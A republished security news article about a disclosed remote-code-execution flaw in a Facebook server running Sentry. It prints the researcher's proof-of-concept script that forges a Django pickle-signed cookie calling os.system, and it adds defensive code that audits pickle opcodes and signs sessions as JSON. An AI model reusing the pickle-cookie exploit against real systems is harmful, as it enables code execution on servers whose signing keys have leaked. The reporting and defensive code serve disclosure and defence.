[SAFE-ID: JIWO-2024-1745]   Author: ecawen   Published: [2018-08-25]

SCRT information security researcher Daniel 'Blaklis' Le Gall discovered a remote code execution vulnerability on one of Facebook's servers. The flaw stemmed from a programming error in the Sentry log-collection software running on that server. By reading the logs, the researcher could see where in the stack the cookie details were handled and where the application used Pickle, and was able to craft a cookie that ran commands on the machine, confirming the vulnerability. Although remote code execution is regarded as a serious issue, by the time Facebook patched the flaw no Facebook user data had been exposed or accessed through the uncovered hole.

Facebook has patched a remote-code execution flaw discovered in one of its servers.

Researcher Daniel 'Blaklis' Le Gall, of SCRT Information Security, said on Friday he bagged a $5,000 bug bounty from the social network for reporting a flaw that could be exploited to execute arbitrary commands using malicious cookies.

Though remote code execution bugs are considered serious problems, Le Gall noted that no Facebook user data was ever exposed or accessed via the uncovered hole. The bug was patched this month prior to today's disclosure.

The programming blunder was spotted in a Facebook server running the Sentry log collection software.

"While I was looking at the application, some stacktraces regularly popped on the page, for an unknown reason," Le Gall explained. "The application seemed to be unstable regarding the user password reset feature, which occasionally crashed."

Looking through the logs, the researcher noted that he was able to see where in the stack the cookie details were handled, as well as spot where the application was using Pickle, a Python data serialization protocol that can be vulnerable to manipulation.

With that information, Le Gall was able to craft cookies that would run commands on the machine. Here is the proof-of-concept exploit – a simple cookie that will tell the server to ping back a response with a 30-second delay:

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
import os

SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
newContent = django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()

print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)
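The root cause above is the combination of a pickle-based session serializer and a recoverable signing key: once the key is known, a signed cookie can carry a pickle stream that names and calls arbitrary Python objects. The following is an added example, not code from the article, from Sentry or from Django. It does two things a defender wants: it audits a cookie payload for object-constructing pickle opcodes without ever deserializing it (using only pickletools, which disassembles rather than executes), and it shows the JSON-serialized, HMAC-signed cookie shape under which a leaked key lets an attacker forge data but not code. The payload segment of the article's own cookie is reused as the benign sample; the `HarmlessReduce` class, the signing key and the cookie layout (`payload:signature`, no timestamp) are constructed for this example and are not the article's or Django's.

```python
"""Audit session-cookie pickle payloads and sign sessions as JSON instead.

Added example; assumptions: cookie layout is 'payload:signature' with
unpadded URL-safe base64 and HMAC-SHA256, and the key below is a test value.
"""
import base64
import hashlib
import hmac
import json
import pickle
import pickletools

# Full cookie quoted in the article; the first segment is a protocol-2 pickle
# of {'testcookie': 'worked'} and contains no code-bearing opcodes.
PAGE_COOKIE = ("gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg"
               ":1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw")

# Opcodes that let a pickle stream look up and call arbitrary Python objects.
# A plain session dict of strings, numbers, lists and dicts never needs them.
RISKY_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                 "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def b64url_decode(segment: str) -> bytes:
    """Decode unpadded URL-safe base64 as Django's signing module writes it."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def risky_pickle_opcodes(data: bytes) -> list:
    """Sorted names of object-constructing opcodes found in a pickle stream.

    pickletools.genops only disassembles the stream; nothing is executed, so
    this can be run over untrusted cookies recovered from logs or traffic.
    """
    return sorted({op.name for op, _arg, _pos in pickletools.genops(data)
                   if op.name in RISKY_OPCODES})


class HarmlessReduce:
    """Constructed stand-in for the article's __reduce__ trick using len(),
    so the scanner's verdict can be shown without running anything."""

    def __reduce__(self):
        return (len, ("abc",))


def audit_page_cookie() -> list:
    """The article's original cookie payload: a plain dict, no risky opcodes."""
    return risky_pickle_opcodes(b64url_decode(PAGE_COOKIE.split(":")[0]))


def audit_reduce_payload() -> list:
    """Any __reduce__-based payload shows up as GLOBAL + REDUCE."""
    return risky_pickle_opcodes(pickle.dumps(HarmlessReduce(), protocol=2))


def sign_session(session: dict, key: bytes) -> str:
    """JSON-serialize, then HMAC-SHA256 sign: 'payload:signature'."""
    payload = base64.urlsafe_b64encode(json.dumps(session).encode()).rstrip(b"=")
    sig = hmac.new(key, payload, hashlib.sha256).digest()
    return payload.decode() + ":" + base64.urlsafe_b64encode(sig).rstrip(b"=").decode()


def load_session(cookie: str, key: bytes) -> dict:
    """Verify the signature, then parse JSON.

    JSON can only produce data, so even a cookie forged with a leaked key
    cannot name a callable the way a pickle payload can.
    """
    payload, _sep, sig = cookie.rpartition(":")
    expected = hmac.new(key, payload.encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        raise ValueError("bad cookie signature")
    return json.loads(b64url_decode(payload))


def is_rejected(cookie: str, key: bytes) -> bool:
    """True when load_session refuses the cookie (bad signature or not JSON)."""
    try:
        load_session(cookie, key)
    except (ValueError, json.JSONDecodeError):
        return True
    return False


def tampered_cookie(cookie: str, new_session: dict) -> str:
    """Swap the payload but keep the old signature, as a forger without the key would."""
    _payload, _sep, sig = cookie.rpartition(":")
    new_payload = base64.urlsafe_b64encode(json.dumps(new_session).encode()).rstrip(b"=")
    return new_payload.decode() + ":" + sig


if __name__ == "__main__":
    key = b"constructed-test-key-not-a-real-secret"
    print("page cookie risky opcodes:", audit_page_cookie())
    print("__reduce__ payload risky opcodes:", audit_reduce_payload())
    good = sign_session({"uid": 7}, key)
    print("round trip:", load_session(good, key))
    print("tampered rejected:", is_rejected(tampered_cookie(good, {"uid": 1}), key))
    print("article cookie rejected under our key:", is_rejected(PAGE_COOKIE, key))
```

The opcode audit is the piece to run over historical cookies and Sentry's own logs when assessing exposure: a session store that only ever held data should never produce a payload containing GLOBAL or REDUCE. The signing half mirrors why Django moved its default session serializer to JSON; the signature still has to be protected, but its compromise no longer equals code execution.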

Say what you will about Facebook, but the company's handling of bug reports appears to be on point. Le Gall said that the same day the flaw was reported, July 30, Facebook took down the server. Ten days later, a patch was in place and the server was brought back online.

The social network has made security a focal point in the aftermath of the Cambridge Analytica scandal, and in this case at least it appears to be paying off.

[Source: jiwo.org]
